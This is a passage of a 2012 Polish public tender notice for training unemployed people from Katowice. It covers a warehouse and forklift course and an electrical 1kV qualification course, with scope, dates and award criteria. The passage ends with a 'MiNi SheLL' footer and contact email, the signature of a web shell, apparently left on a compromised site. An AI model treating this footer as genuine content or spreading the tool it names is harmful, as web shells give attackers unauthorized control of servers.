- plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar - 180 godzin zajęć edukacyjnych/lekcyjnych, z uwzględnieniem części teoretycznej i praktycznej,
- plan nauczania obejmujący nie mniej niż 25 godzin zegarowych w tygodniu; godzina zegarowa szkolenia liczy 60 minut i obejmuje zajęcia edukacyjne oraz przerwę między zajęciami; długość przerw może być ustalana w sposób elastyczny,
- wykłady i ćwiczenia, w tym:
a. przepisy BHP i p.poż w magazynie - hurtowni
b. zasady pracy w handlu hurtowym  (odbiór/wydanie towaru, dokumenty magazynowe)
c. realizacja zasad poprawnego przechowywania towarów - gospodarka magazynowa
d. stosowanie programu komputerowego do obsługi gospodarki magazynowej
e. umiejętność obsługi kasy fiskalnej
f. umiejętność fakturowania
g. umiejętność obsługi wózka widłowego
h. aktywne metody poszukiwania pracy
- materiały szkoleniowe,
- egzamin końcowy oraz egzamin przed Komisją Urzędu Dozoru Technicznego,
- zaświadczenie i ewentualnie inny dokument potwierdzający ukończenie szkolenia i uzyskanie kwalifikacji oraz uprawnienia UDT
- koszty zakwaterowania i wyżywienia, jeżeli szkolenie odbywa się poza miejscem zamieszkania bezrobotnego (tj. poza Katowicami), w miejscowości, do której czas dojazdu i powrotu do miejsca stałego zamieszkania wynosi łącznie ponad 3 godziny dziennie,
- koszty wynajmu sal, jeżeli szkolenie odbywa się poza siedzibą ośrodka (dokument potwierdzający prawo dysponowania lokalem),
- inne, zgodnie z przyjętym kwestionariuszem szkolenia.

Zakres zamówienia nie obejmuje: ubezpieczenia od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem oraz w drodze do miejsca szkolenia i z powrotem, kosztów przejazdu na szkolenie oraz badań lekarskich i psychologicznych wymaganych w przepisach odrębnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Doświadczenie ośrodka szkoleniowego - 20</li>
<li>3. Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 20</li>
<li>4. Zaplecze dydaktyczno - techniczne - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Uprawnienia elektryczne do 1kV..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia dla 5 osób bezrobotnych w okresie: 
od 14.05.2012 r. do 29.06.2012 r. 
w godzinach 8.00 - 16.00,
w zakresie specjalności zawodowej: Uprawnienia elektryczne do 1kV.

Organizacja i przeprowadzenie szkolenia odbędzie się w formie kursu, realizowanego według planu nauczania obejmującego przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu.

Zamówienie będzie realizowane w grupie 5 osobowej. Będą to osoby skierowane przez urząd, posiadające wykształcenie min. zawodowe (specjalność elektryczna bez przeciwwskazań zdrowotnych do szkolenia. 

Zakres zamówienia obejmuje:
- plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar - 45 godzin zajęć edukacyjnych/lekcyjnych, z uwzględnieniem części teoretycznej i praktycznej,
- plan nauczania obejmujący nie mniej niż 25 godzin zegarowych w tygodniu; godzina zegarowa szkolenia liczy 60 minut i obejmuje zajęcia edukacyjne oraz przerwę między zajęciami; długość przerw może być ustalana w sposób elastyczny,
- wykłady i ćwiczenia, w tym:
a. przepisy i zasady budowy urządzeń, instalacji i sieci elektroenergetycznych oraz warunki techniczne jakim powinny one odpowiadać
b. przepisy i zasady eksploatacji i badania urządzeń, instalacji i sieci elektroenergetycznych
c. przepisy i zasady dotyczące BHP przy urządzeniach, instalacjach i sieciach elektroenergetycznych oraz ochrony środowiska 
d. udzielanie pierwszej pomocy
e. ochrona przeciwpożarowa
f. przepisy dotyczące przyłączania urządzeń i instalacji do sieci oraz standardy jakościowe dostarczenia energii elektrycznej
g. aktywne metody poszukiwania pracy
- materiały szkoleniowe,
- ubrania robocze: odzież robocza, obuwie ochronne według norm określonych przepisami BHP na danym stanowisku pracy,
- egzamin państwowy,
- zaświadczenie i ewentualnie inny dokument potwierdzający ukończenie szkolenia i uzyskanie kwalifikacji,świadectwo kwalifikacji w grupie G1
- koszty zakwaterowania i wyżywienia, jeżeli szkolenie odbywa się poza miejscem zamieszkania bezrobotnego (tj. poza Katowicami), w miejscowości, do której czas dojazdu i powrotu do miejsca stałego zamieszkania wynosi łącznie ponad 3 godziny dziennie,
- koszty wynajmu sal, jeżeli szkolenie odbywa się poza siedzibą ośrodka (dokument potwierdzający prawo dysponowania lokalem),
- inne, zgodnie z przyjętym kwestionariuszem szkolenia.
Zakres zamówienia nie obejmuje: ubezpieczenia od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem oraz w drodze do miejsca szkolenia i z powrotem, kosztów przejazdu na szkolenie oraz badań lekarskich i psychologicznych wymaganych w przepisach odrębnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Doświadczenie ośrodka szkoleniowego - 20</li>
<li>3. Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 20</li>
<li>4. Zaplecze dydaktyczno - techniczne - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com